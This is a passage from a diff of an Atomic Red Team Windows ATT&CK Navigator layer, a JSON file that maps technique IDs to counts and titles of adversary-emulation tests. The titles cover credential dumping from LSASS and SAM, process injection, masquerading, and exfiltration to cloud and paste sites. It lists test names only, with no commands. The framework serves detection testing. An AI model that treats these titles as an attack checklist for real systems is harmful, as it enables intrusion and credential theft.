Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":1,"enabled":true,"comment":"\n- PowerShell Version 2 Downgrade\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"comment":"\n- RDP hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}],"comment":"\n- Extract binary files via VBA\n- Create a Hidden User Called \"$\"\n- Create an \"Administrator \" user (with a space on the end)\n- Create and Hide a Service with sc.exe\n- Command Execution with NirCmd\n"},{"techniqueID":"T1564.001","score":5,"enabled":true,"comment":"\n- Create Windows System File with Attrib\n- Create Windows Hidden File with Attrib\n- Hide Files Through Registry\n- Create Windows Hidden File with powershell\n- Create Windows System File with powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":1,"enabled":true,"comment":"\n- Create Hidden User in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"comment":"\n- Hidden Window\n- Headless Browser Accessing Mockbin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"comment":"\n- Alternate Data Streams (ADS)\n- Store file in Alternate Data Stream (ADS)\n- Create ADS command prompt\n- Create ADS PowerShell\n- Create Hidden Directory via $index_allocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"comment":"\n- Register Portable Virtualbox\n- Create and start VirtualBox virtual machine\n- Create and start Hyper-V virtual machine\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"comment":"\n- Download Macro-Enabled Phishing Attachment\n- Word spawned a command shell and used an IP address in the command line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data with rclone to cloud Storage - Mega (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"comment":"\n- Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":5,"enabled":true,"comment":"\n- Execute a Command as a Service\n- Use PsExec to execute a command on a remote host\n- BlackCat pre-encryption cmds with Lateral Movement\n- Use RemCom to execute a command on a remote host\n- Snake Malware Service Create\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"comment":"\n- Exfiltration Over SMB over QUIC (New-SmbMapping)\n- Exfiltration Over SMB over QUIC (NET USE)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"comment":"\n- DNS over HTTPS Large Query Volume\n- DNS over HTTPS Regular Beaconing\n- DNS over HTTPS Long Domain Query\n- run ngrok\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"comment":"\n- OpenSSL C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"comment":"\n- DLL Search Order Hijacking - amsi.dll\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"comment":"\n- DLL Side-Loading using the Notepad++ GUP.exe binary\n- DLL Side-Loading using the dotnet startup hook environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"comment":"\n- powerShell Persistence via hijacking default modules - Get-Variable.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"comment":"\n- Execution of program.exe as service with unquoted service path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"comment":"\n- Service Registry Permissions Weakness\n- Service ImagePath Change with reg.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"comment":"\n- User scope COR_PROFILER\n- System Scope COR_PROFILER\n- Registry-free process scope COR_PROFILER\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"comment":"\n- Enumerate PlugNPlay Camera\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1614","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":2,"enabled":true,"comment":"\n- Discover System Language by Registry Query\n- Discover System Language with chcp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"comment":"\n- Display group policy information via gpresult\n- Get-DomainGPO to display group policy information via PowerView\n- WinPwn - GPOAudit\n- WinPwn - GPORemoteAccessPolicy\n- MSFT Get-GPO Cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"comment":"\n- WinPwn - Reflectively load Mimik@tz into memory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"comment":"\n- Staging Local Certificates via Export-Certificate\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":1,"enabled":true,"comment":"\n- Get-EventLog To Enumerate Windows Security Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]}
\ No newline at end of file
+{"name":"Atomic Red Team (Windows)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Windows"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1001/T1001.md"}]},{"techniqueID":"T1001.002","score":2,"enabled":true,"comment":"\n- Steganographic Tarball Embedding\n- Embedded Script in Image Execution via Extract-Invoke-PSImage\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1001.002/T1001.002.md"}]},{"techniqueID":"T1003","score":40,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}],"comment":"\n- Gsecdump\n- Credential Dumping with NPPSpy\n- Dump svchost.exe to gather RDP credentials\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)\n- Dump Credential Manager using keymgr.dll and rundll32.exe\n"},{"techniqueID":"T1003.001","score":14,"enabled":true,"comment":"\n- Dump LSASS.exe Memory using ProcDump\n- Dump LSASS.exe Memory using comsvcs.dll\n- Dump LSASS.exe Memory using direct system calls and API unhooking\n- Dump LSASS.exe Memory using NanoDump\n- Dump LSASS.exe Memory using Windows Task Manager\n- Offline Credential Theft With Mimikatz\n- LSASS read with pypykatz\n- Dump LSASS.exe Memory using Out-Minidump.ps1\n- Create Mini Dump of LSASS.exe using ProcDump\n- Powershell Mimikatz\n- Dump LSASS with createdump.exe from .Net v5\n- Dump LSASS.exe using imported Microsoft DLLs\n- Dump LSASS.exe using lolbin rdrleakdiag.exe\n- Dump LSASS.exe Memory through Silent Process Exit\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"comment":"\n- Registry dump of SAM, creds, and secrets\n- Registry parse with pypykatz\n- esentutl.exe SAM copy\n- PowerDump Hashes and Usernames from Registry\n- dump volume shadow copy hives with certutil\n- dump volume shadow copy hives with System.IO.File\n- WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":9,"enabled":true,"comment":"\n- Create Volume Shadow Copy with vssadmin\n- Copy NTDS.dit from Volume Shadow Copy\n- Dump Active Directory Database with NTDSUtil\n- Create Volume Shadow Copy with WMI\n- Create Volume Shadow Copy remotely with WMI\n- Create Volume Shadow Copy remotely (WMI) with esentutl\n- Create Volume Shadow Copy with Powershell\n- Create Symlink to Volume Shadow Copy\n- Create Volume Shadow Copy with diskshadow\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"comment":"\n- Dumping LSA Secrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"comment":"\n- Cached Credential Dump via Cmdkey\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"comment":"\n- DCSync (Active Directory)\n- Run DSInternals Get-ADReplAccount\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1005","score":1,"enabled":true,"comment":"\n- Search files of interest and save them to a single zip file (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"comment":"\n- Read volume boot sector via DOS device path (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":2,"enabled":true,"comment":"\n- System Service Discovery\n- System Service Discovery - net.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"comment":"\n- List Process Main Windows - C# .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"comment":"\n- Query Registry\n- Query Registry with Powershell cmdlets\n- Enumerate COM Objects in Registry with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":7,"enabled":true,"comment":"\n- System Network Configuration Discovery on Windows\n- List Windows Firewall Rules\n- System Network Configuration Discovery (TrickBot Style)\n- List Open Egress Ports\n- Adfind - Enumerate Active Directory Subnet Objects\n- Qakbot Recon\n- DNS Server Discovery Using nslookup\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":15,"enabled":true,"comment":"\n- Remote System Discovery - net\n- Remote System Discovery - net group Domain Computers\n- Remote System Discovery - nltest\n- Remote System Discovery - ping sweep\n- Remote System Discovery - arp\n- Remote System Discovery - nslookup\n- Remote System Discovery - adidnsdump\n- Adfind - Enumerate Active Directory Computer Objects\n- Adfind - Enumerate Active Directory Domain Controller Objects\n- Enumerate domain computers within Active Directory using DirectorySearcher\n- Enumerate Active Directory Computers with Get-AdComputer\n- Enumerate Active Directory Computers with ADSISearcher\n- Get-DomainController with PowerView\n- Get-WmiObject to Enumerate Domain Controllers\n- Remote System Discovery - net group Domain Controller\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"comment":"\n- IcedID Botnet HTTP PUT\n- Exfiltration via Encrypted FTP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"comment":"\n- RDP to DomainController\n- Changing RDP Port to Non Standard Port via Powershell\n- Changing RDP Port to Non Standard Port via Command_Prompt\n- Disable NLA for RDP via Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"comment":"\n- Map admin share\n- Map Admin Share PowerShell\n- Copy and Execute File with PsExec\n- Execute command writing output to local Admin Share\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"comment":"\n- PowerShell Lateral Movement using MMC20\n- PowerShell Lateral Movement Using Excel Application Object\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"comment":"\n- Enable Windows Remote Management\n- Remote Code Execution with PS Credentials Using Invoke-Command\n- WinRM Access with Evil-WinRM\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Execute base64-encoded PowerShell\n- Execute base64-encoded PowerShell from Windows Registry\n- Execution from Compressed File\n- DLP Evasion via Sensitive Data in VBA Macro over email\n- DLP Evasion via Sensitive Data in VBA Macro over HTTP\n- Obfuscated Command in PowerShell\n- Obfuscated Command Line using special Unicode characters\n- Snake Malware Encrypted crmlog file\n- Execution from Compressed JScript File\n"},{"techniqueID":"T1027.004","score":2,"enabled":true,"comment":"\n- Compile After Delivery using csc.exe\n- Dynamic C# Compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"comment":"\n- HTML Smuggling Remote Payload\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"comment":"\n- Dynamic API Resolution-Ninja-syscall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"comment":"\n- Network-Based Data Transfer in Small Chunks\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":6,"enabled":true,"comment":"\n- System Owner/User Discovery\n- Find computers where user has session - Stealth mode (PowerView)\n- User Discovery With Env Vars PowerShell Script\n- GetCurrent User with PowerShell Script\n- System Discovery - SocGholish whoami\n- System Owner/User Discovery Using Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}],"comment":"\n- System File Copied to Unusual Location\n- Malware Masquerading and Execution from Zip File\n"},{"techniqueID":"T1036.003","score":8,"enabled":true,"comment":"\n- Masquerading as Windows LSASS process\n- Masquerading - cscript.exe running as notepad.exe\n- Masquerading - wscript.exe running as svchost.exe\n- Masquerading - powershell.exe running as taskhostw.exe\n- Masquerading - non-windows exe running as windows exe\n- Masquerading - windows exe running as different windows exe\n- Malicious process Masquerading as LSM.exe\n- File Extension Masquerading\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":2,"enabled":true,"comment":"\n- Creating W32Time similar named service using schtasks\n- Creating W32Time similar named service using sc\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Masquerade as a built-in system executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1037","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"comment":"\n- Logon Scripts\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"comment":"\n- Copy a sensitive File over Administrative share with copy\n- Copy a sensitive File over Administrative share with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":5,"enabled":true,"comment":"\n- Packet Capture Windows Command Prompt\n- Windows Internal Packet Capture\n- Windows Internal pktmon capture\n- Windows Internal pktmon set filter\n- PowerShell Network Sniffing\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"comment":"\n- C2 Data Exfiltration\n- Text Based Data Exfiltration using DNS subdomains\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":7,"enabled":true,"comment":"\n- Port Scan NMap for Windows\n- Port Scan using python\n- WinPwn - spoolvulnscan\n- WinPwn - MS17-10\n- WinPwn - bluekeep\n- WinPwn - fruit\n- Port-Scanning /24 Subnet with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"comment":"\n- WMI Reconnaissance Users\n- WMI Reconnaissance Processes\n- WMI Reconnaissance Software\n- WMI Reconnaissance List Remote Services\n- WMI Execute Local Process\n- WMI Execute Remote Process\n- Create a Process using WMI Query and an Encoded Command\n- Create a Process using obfuscated Win32_Process\n- WMI Execute rundll32\n- Application uninstall using WMIC\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- DNSExfiltration (doh)\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":5,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - ICMP\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - SMTP\n- MAZE FTP Upload\n- Exfiltration Over Alternative Protocol - FTP - Rclone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":3,"enabled":true,"comment":"\n- System Network Connections Discovery\n- System Network Connections Discovery with PowerShell\n- System Discovery using SharpView\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At.exe Scheduled task\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"comment":"\n- Scheduled Task Startup Script\n- Scheduled task Local\n- Scheduled task Remote\n- Powershell Cmdlet Scheduled Task\n- Task Scheduler via VBA\n- WMI Invoke-CimMethod Scheduled Task\n- Scheduled Task Executing Base64 Encoded Commands From Registry\n- Import XML Schedule Task with Hidden Attribute\n- PowerShell Modify A Scheduled Task\n- Scheduled Task (\"Ghost Task\") via Registry Key Manipulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}],"comment":"\n- Shellcode execution via VBA\n- Remote Process Injection in LSASS via mimikatz\n- Section View Injection\n- Dirty Vanity process Injection\n- Read-Write-Execute process Injection\n- Process Injection with Go using UuidFromStringA WinAPI\n- Process Injection with Go using EtwpCreateEtwThread WinAPI\n- Remote Process Injection with Go using RtlCreateUserThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)\n- Process Injection with Go using CreateThread WinAPI\n- Process Injection with Go using CreateThread WinAPI (Natively)\n- UUID custom process Injection\n"},{"techniqueID":"T1055.001","score":2,"enabled":true,"comment":"\n- Process Injection via mavinject.exe\n- WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"comment":"\n- Portable Executable Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"comment":"\n- Thread Execution Hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"comment":"\n- Process Injection via C#\n- EarlyBird APC Queue Injection in Go\n- Remote Process Injection with Go using NtQueueApcThreadEx WinAPI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"comment":"\n- Process Injection via Extra Window Memory (EWM) x64 executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"comment":"\n- Process Hollowing using PowerShell\n- RunPE via VBA\n- Process Hollowing in Go using CreateProcessW WinAPI\n- Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"comment":"\n- Process injection ListPlanting\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":1,"enabled":true,"comment":"\n- Input Capture\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":1,"enabled":true,"comment":"\n- PowerShell - Prompt User for Password\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"comment":"\n- Hook PowerShell TLS Encrypt/Decrypt Messages\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":5,"enabled":true,"comment":"\n- Process Discovery - tasklist\n- Process Discovery - Get-Process\n- Process Discovery - get-wmiObject\n- Process Discovery - wmic process\n- Discover Specific Process - tasklist\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":34,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}],"comment":"\n- AutoIt Script Execution\n"},{"techniqueID":"T1059.001","score":22,"enabled":true,"comment":"\n- Mimikatz\n- Run BloodHound from local disk\n- Run Bloodhound from Memory using Download Cradle\n- Mimikatz - Cradlecraft PsSendKeys\n- Invoke-AppPathBypass\n- Powershell MsXml COM object - with prompt\n- Powershell XML requests\n- Powershell invoke mshta.exe download\n- Powershell Invoke-DownloadCradle\n- PowerShell Fileless Script Execution\n- NTFS Alternate Data Stream Access\n- PowerShell Session Creation and Use\n- ATHPowerShellCommandLineParameter -Command parameter variations\n- ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments\n- PowerShell Command Execution\n- PowerShell Invoke Known Malicious Cmdlets\n- PowerUp Invoke-AllChecks\n- Abuse Nslookup with DNS Records\n- SOAPHound - Dump BloodHound Data\n- SOAPHound - Build Cache\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"comment":"\n- Create and Execute Batch Script\n- Writes text to a file and displays it.\n- Suspicious Execution via Windows Command Shell\n- Simulate BlackByte Ransomware Print Bombing\n- Command Prompt read contents from CMD file and execute\n- Command prompt writing script to file then executes 